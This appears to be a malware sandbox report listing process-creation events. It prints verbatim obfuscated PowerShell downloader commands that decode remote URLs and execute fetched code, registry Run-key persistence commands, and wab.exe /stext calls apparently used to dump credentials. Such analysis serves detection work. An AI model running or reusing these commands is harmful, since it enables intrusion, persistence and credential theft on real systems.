              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. 
SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"
              Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. 
,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
              Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
              Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe | Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
              Source: C:\Windows\SysWOW64\relog.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. 
schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. 
schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 